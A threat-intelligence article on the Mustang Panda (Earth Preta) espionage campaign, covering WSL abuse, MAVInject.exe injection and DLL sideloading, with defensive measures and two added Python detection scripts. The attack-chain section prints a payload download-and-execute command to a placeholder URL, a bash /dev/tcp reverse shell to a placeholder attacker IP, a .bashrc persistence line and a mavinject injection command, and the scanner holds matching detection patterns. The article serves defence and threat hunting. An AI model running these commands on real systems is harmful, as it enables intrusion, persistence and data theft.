Mustang Panda Cyber Attack: Chinese Hackers Exploit Microsoft Tool to Bypass Antivirus and Install Backdoors

Unmasking Mustang Panda: Cyber Espionage Redefined

The Mustang Panda cyber attack is making headlines as Chinese hackers leverage the Microsoft Windows Subsystem for Linux (WSL) to bypass antivirus defenses, creating a widespread cybersecurity threat. By exploiting this tool, attackers evade detection, install backdoors, and execute malicious payloads with unprecedented stealth. The attack is attributed to the notorious Chinese cyber-espionage group Mustang Panda (also tracked as Earth Preta), which targets government agencies, think tanks, and NGOs globally, primarily in Asia, Europe, and the United States. This new attack method exposes a critical vulnerability in Microsoft's security architecture and underscores the growing complexity of cyber threats.

How This Attack Works

The attack method hinges on exploiting the WSL, a Microsoft feature that allows users to run native Linux binaries on Windows systems. This capability provides a seamless way to execute Linux scripts within the Windows environment without triggering traditional Windows-based antivirus solutions. Here’s how the attack unfolds:

  1. Initial Access via Spear-Phishing:

    • The attackers initiate the attack by sending spear-phishing emails containing malicious attachments. These emails are meticulously crafted to appear legitimate, often mimicking trusted contacts or official communications.
    • Once the victim opens the attachment or clicks on the embedded link, a malicious script executes, deploying the initial payload.

2. Payload Delivery and Execution:

    • The payload is designed to run within the WSL environment, bypassing traditional Windows security measures.
    • Using tools like wget or curl, the payload downloads additional malware components from remote servers:

wget http://<malicious_url>/payload -O /tmp/payload
chmod +x /tmp/payload
/tmp/payload

3. Compiling and Executing ELF Binaries:

    • Attackers compile malicious ELF binaries specifically designed for the WSL environment. These binaries are undetectable by traditional Windows antivirus solutions as they are executed within the Linux subsystem.
    • An example of a reverse shell code commonly used in such attacks is:

#!/bin/bash
# Reverse shell example for WSL exploitation
bash -i >& /dev/tcp/<Attacker_IP>/<Port> 0>&1

4. Maintaining Persistence:

    • To maintain long-term access, the attackers modify startup scripts such as .bashrc or .profile, ensuring the payload executes each time the WSL environment is launched:

echo "/tmp/payload" >> ~/.bashrc

5. C2 Communication and Data Exfiltration:

    • The attackers establish communication with their Command and Control (C2) servers using encrypted channels, allowing them to remotely control the compromised system.
    • Tools like nc (netcat) or custom TCP clients facilitate secure data exfiltration and remote command execution. 

Advanced Techniques Utilized by Earth Preta

1. Exploitation of MAVInject.exe:

    • Earth Preta uses MAVInject.exe, the Microsoft Application Virtualization Injector, to inject malware into waitfor.exe, a Windows process used for signaling between networked computers.
    • The technique is specifically designed to bypass detection by ESET antivirus, leveraging MAVInject.exe to disguise malicious activity as legitimate system processes.

mavinject.exe /INJECTRUNNING <Process_ID> <Malicious_DLL>

2. Setup Factory Exploitation:

    • The group exploits Setup Factory, a Windows software installer tool, to drop and execute malicious payloads.
    • This approach ensures persistence and stealth by masquerading malicious components as legitimate software installers.

3. Use of IRSetup.exe Dropper:

    • The attack chain begins with a malicious dropper, IRSetup.exe, which deploys multiple files into the ProgramData/session directory.
    • It executes a decoy PDF related to anti-crime initiatives to divert suspicion while the malware establishes system control.

4. Abuse of OriginLegacyCLI.exe:

    • Earth Preta abuses OriginLegacyCLI.exe, a legitimate Electronic Arts application, to sideload EACore.dll, a modified version of the Toneshell backdoor.
    • If ESET processes are detected, regsvr32.exe registers EACore.dll, triggering the execution of waitfor.exe.
    • MAVInject.exe then injects malicious code into the running process.

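The chain just described (OriginLegacyCLI.exe sideloading EACore.dll, regsvr32.exe registering it, waitfor.exe being started, MAVInject.exe injecting into that process) is exactly what a detection rule should tie together rather than alerting on any single binary. The following is an added example, not code from the article or from any vendor: Python rules run over constructed process-creation records of the kind a SIEM receives from Sysmon Event ID 1 or Security event 4688. The field names, paths and PIDs are invented for the demonstration, and the idea that the sideload host runs from the ProgramData\session drop directory and that regsvr32.exe/OriginLegacyCLI.exe are unusual parents for waitfor.exe are assumptions drawn from the article's description. The same logic covers the "Detection of MAVInject.exe Abuse" measure later on the page.

```python
"""Correlate process-creation events for the MAVInject/sideload chain.

Added example (not from the article or any vendor): rules over a list of
process-creation records for the binaries the article names. Field names,
paths and PIDs below are constructed for the demonstration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Alert:
    rule: str
    pid: int
    severity: str
    detail: str


TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SIDELOAD_HOSTS = {"originlegacycli.exe"}             # legitimate EA binary abused for sideloading
UNUSUAL_WAITFOR_PARENTS = {"regsvr32.exe", "originlegacycli.exe"}  # assumption: not normal parents
INJECT_RE = re.compile(r"/injectrunning\s+(\d+)\s+(\S+)")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_trusted_dir(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def detect(events: list[dict]) -> list[Alert]:
    """Apply every rule to every event; alerts are returned in event order."""
    by_pid = {e["pid"]: e for e in events}
    alerts: list[Alert] = []
    for e in events:
        pid = e["pid"]
        image, parent = basename(e["image"]), basename(e.get("parent", ""))
        cmd = e.get("cmdline", "").lower()

        # Rule 1: MAVInject.exe /INJECTRUNNING. Severity rises when the target
        # PID resolves to waitfor.exe, the process the article names.
        if image == "mavinject.exe" and "/injectrunning" in cmd:
            m = INJECT_RE.search(cmd)
            target = by_pid.get(int(m.group(1))) if m else None
            tgt_name = basename(target["image"]) if target else "unknown"
            sev = "high" if tgt_name == "waitfor.exe" else "medium"
            dll = m.group(2) if m else "?"
            alerts.append(Alert("mavinject-injectrunning", pid, sev, f"injects {dll} into {tgt_name}"))

        # Rule 2: regsvr32.exe registering a DLL outside the trusted install
        # directories (catches the EACore.dll registration step).
        if image == "regsvr32.exe":
            tokens = [t.strip('"') for t in e.get("cmdline", "").split()]
            for dll in (t for t in tokens if t.lower().endswith(".dll")):
                if not in_trusted_dir(dll):
                    alerts.append(Alert("regsvr32-untrusted-dll", pid, "medium", f"registers {dll}"))

        # Rule 3: waitfor.exe spawned by a registration/sideload binary rather
        # than by an interactive shell or script host.
        if image == "waitfor.exe" and parent in UNUSUAL_WAITFOR_PARENTS:
            alerts.append(Alert("waitfor-unusual-parent", pid, "medium", f"parent {parent}"))

        # Rule 4 (assumption): the sideload host running from a non-install
        # location such as the ProgramData\session directory the dropper creates.
        if image in SIDELOAD_HOSTS and not in_trusted_dir(e["image"]):
            alerts.append(Alert("sideload-host-unusual-path", pid, "low", e["image"]))
    return alerts


# Constructed sample telemetry: one benign login, the article's chain, and a
# benign waitfor.exe started from cmd.exe that must not be flagged.
SAMPLE_EVENTS = [
    {"pid": 4100, "image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4212, "image": r"C:\ProgramData\session\OriginLegacyCLI.exe",
     "parent": r"C:\ProgramData\session\IRSetup.exe", "cmdline": "OriginLegacyCLI.exe"},
    {"pid": 4300, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent": r"C:\ProgramData\session\OriginLegacyCLI.exe",
     "cmdline": r'regsvr32.exe /s "C:\ProgramData\session\EACore.dll"'},
    {"pid": 4412, "image": r"C:\Windows\System32\waitfor.exe",
     "parent": r"C:\Windows\System32\regsvr32.exe", "cmdline": "waitfor.exe /t 120 signal"},
    {"pid": 4520, "image": r"C:\Windows\System32\mavinject.exe",
     "parent": r"C:\ProgramData\session\OriginLegacyCLI.exe",
     "cmdline": r"mavinject.exe /INJECTRUNNING 4412 C:\ProgramData\session\EACore.dll"},
    {"pid": 5000, "image": r"C:\Windows\System32\waitfor.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "waitfor.exe /t 30 build_done"},
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity:6}] pid={a.pid} {a.rule}: {a.detail}")
```

Run against the sample, the four steps of the chain each raise an alert while the benign waitfor.exe invocation from cmd.exe stays silent; the PID cross-reference in rule 1 is what distinguishes "MAVInject was run" from "MAVInject was run against waitfor.exe", which is the specific pattern the article attributes to Earth Preta.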
Who Is Behind the Attacks?

The attacks are orchestrated by Mustang Panda, also known as Earth Preta, Bronze President, TA416, and RedDelta. Active since at least 2012, Mustang Panda is a Chinese state-sponsored Advanced Persistent Threat (APT) group known for its strategic cyber-espionage campaigns. They primarily target:

  • Government agencies, including diplomatic and defense entities.
  • Non-Governmental Organizations (NGOs) with political and human rights advocacy focuses.
  • Think tanks and research institutions, particularly those involved in international relations and defense studies.

Their modus operandi involves:

  • Social Engineering: Crafting highly convincing spear-phishing emails, often using native language lures and themes relevant to the target’s geopolitical context.
  • Code Injection and DLL Sideloading: Utilizing MAVInject.exe and OriginLegacyCLI.exe to execute payloads stealthily.
  • Advanced Persistence Mechanisms: Leveraging IRSetup.exe and Setup Factory to maintain control within compromised networks.

Mustang Panda’s activities are closely aligned with Chinese strategic interests, gathering intelligence on political developments, defense initiatives, and diplomatic relations, particularly in Asia, Europe, and the United States. 

Defensive Measures Specifically Tailored for Mustang Panda’s Tactics

  1. WSL-Specific Security Measures:

    • Disable WSL Where Unnecessary:

Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

    • Monitor WSL Activity: Track .bashrc and .profile modifications and unusual network connections from WSL.

2. Advanced Spear-Phishing Defense:

    • Conduct regular simulations replicating Mustang Panda’s phishing styles.
    • Deploy AI-based email security solutions to detect targeted spear-phishing campaigns.

3. Detection of MAVInject.exe Abuse:

    • Monitor and restrict execution of MAVInject.exe and OriginLegacyCLI.exe.
    • Deploy custom detection rules to identify unusual DLL injections and process behavior.

4. Network Defense and C2 Communication Monitoring:

    • Implement network segmentation to isolate systems using WSL.
    • Monitor DNS queries and network traffic for known C2 patterns associated with Mustang Panda.

5. Incident Response and Threat Hunting:

    • Proactively hunt for TTPs used by Mustang Panda as outlined in the MITRE ATT&CK framework.
    • Develop incident response playbooks tailored to MAVInject.exe and OriginLegacyCLI.exe exploitation.
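The persistence step described earlier (appending /tmp/payload to ~/.bashrc) and the "Monitor WSL Activity" measure above both come down to inspecting shell start-up files for entries that should never be there. The following is an added example, not code from the article: a small Python scanner that reads .bashrc/.profile text and flags lines that execute files from world-writable temp directories, use bash's /dev/tcp redirection, or pipe a download into a shell. The sample .bashrc is constructed; the rule set goes slightly beyond the article's single echo line so that it also catches the other idioms the article mentions (temp-directory execution and /dev/tcp). Run it from inside each distribution against /home/*/.bashrc and /home/*/.profile, or feed it files copied out of the distribution's filesystem.

```python
"""Scan WSL shell start-up files for persistence entries.

Added example (not code from the original article): flags lines in
.bashrc/.profile that match the persistence and reverse-shell idioms the
article describes. The sample file content is constructed.
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass


@dataclass
class Finding:
    file: str
    lineno: int
    line: str
    reason: str


# Each rule is (compiled regex, human-readable reason). Extend as needed.
RULES = [
    (re.compile(r"(?:^|[\s;&|(])(?:/tmp|/var/tmp|/dev/shm)/\S+"),
     "runs a file from a world-writable temp directory"),
    (re.compile(r"/dev/tcp/"),
     "opens a raw TCP connection via bash's /dev/tcp (reverse-shell idiom)"),
    (re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b"),
     "downloads content and pipes it straight into a shell"),
]


def scan_rc_text(text: str, filename: str) -> list[Finding]:
    """Return one Finding per non-comment line that matches a rule."""
    findings: list[Finding] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments never execute
        for pattern, reason in RULES:
            if pattern.search(line):
                findings.append(Finding(filename, lineno, line, reason))
                break  # one finding per line is enough
    return findings


def scan_rc_files(paths: list[str]) -> list[Finding]:
    """Scan real files, e.g. /home/*/.bashrc from inside a WSL distribution."""
    findings: list[Finding] = []
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_rc_text(fh.read(), path))
        except OSError as exc:
            print(f"skip {path}: {exc}", file=sys.stderr)
    return findings


# Constructed sample: the start of a stock Ubuntu .bashrc with the article's
# persistence line appended, as 'echo "/tmp/payload" >> ~/.bashrc' would do.
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
case $- in
    *i*) ;;
      *) return;;
esac
HISTCONTROL=ignoreboth
export PATH="$HOME/.local/bin:$PATH"
alias ll='ls -alF'
/tmp/payload
"""


if __name__ == "__main__":
    results = (scan_rc_files(sys.argv[1:]) if len(sys.argv) > 1
               else scan_rc_text(SAMPLE_BASHRC, "~/.bashrc (sample)"))
    for f in results:
        print(f"{f.file}:{f.lineno}: {f.reason}: {f.line}")
```

The first rule deliberately requires the temp path to start a command (line start or after a separator), so an environment assignment such as TMPDIR=/tmp/mine is not reported; a legitimate .bashrc rarely executes anything from /tmp, so any hit is worth a look.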

To Sum Up

The sophisticated tactics used by Earth Preta, including the abuse of MAVInject.exe and OriginLegacyCLI.exe, demonstrate the growing complexity of state-sponsored cyber-espionage campaigns. Organizations must deploy advanced security measures, including WSL-specific monitoring, enhanced spear-phishing defenses, and proactive threat hunting, to defend against these evolving threats.

Collaboration between cybersecurity vendors and continuous intelligence sharing is crucial for countering Mustang Panda’s tactics. By staying informed and vigilant, organizations can safeguard sensitive data and maintain resilience against cyber-espionage campaigns targeting critical infrastructure worldwide. 


Author

  • Maya Pillai is a tech writer with 20+ years of experience curating engaging content. She can translate complex ideas into clear, concise information for all audiences.
